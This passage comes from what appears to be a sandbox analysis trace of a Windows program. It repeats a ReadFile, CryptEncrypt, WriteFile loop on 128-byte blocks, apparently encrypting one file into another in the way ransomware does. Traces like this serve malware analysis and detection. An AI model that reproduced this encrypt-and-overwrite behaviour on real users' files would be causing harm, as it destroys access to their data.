nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.173] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.173] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.174] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.174] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.175] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.175] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, 